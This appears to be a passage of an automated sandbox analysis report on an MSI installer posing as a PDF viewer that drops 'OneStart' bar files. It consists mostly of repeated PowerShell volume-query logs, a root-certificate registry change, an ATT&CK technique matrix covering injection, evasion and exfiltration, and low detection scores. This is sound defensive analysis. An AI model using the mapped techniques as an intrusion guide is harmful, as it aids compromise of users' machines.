          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A Blob
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Replication Through Removable Media
          1
          Windows Management Instrumentation
          1
          Scheduled Task/Job
          11
          Process Injection
          11
          Masquerading
          OS Credential Dumping1
          Process Discovery
          1
          Replication Through Removable Media
          Data from Local SystemExfiltration Over Other Network Medium2
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Scheduled Task/Job
          21
          Registry Run Keys / Startup Folder
          1
          Scheduled Task/Job
          1
          Modify Registry
          LSASS Memory21
          Virtualization/Sandbox Evasion
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          PowerShell
          1
          DLL Side-Loading
          21
          Registry Run Keys / Startup Folder
          1
          Disable or Modify Tools
          Security Account Manager1
          Application Window Discovery
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)2
          DLL Search Order Hijacking
          1
          DLL Side-Loading
          21
          Virtualization/Sandbox Evasion
          NTDS11
          Peripheral Device Discovery
          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon Script2
          DLL Search Order Hijacking
          11
          Process Injection
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items2
          DLL Search Order Hijacking
          DCSync13
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          PDFViewer_44882564 (1).msi3%ReversingLabs
          PDFViewer_44882564 (1).msi2%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\MSI112.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI112.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI9297.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI9297.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe0%VirustotalBrowse
          C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dll0%VirustotalBrowse
          C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll0%VirustotalBrowse
          C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll0%VirustotalBrowse
          C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dll0%ReversingLabs
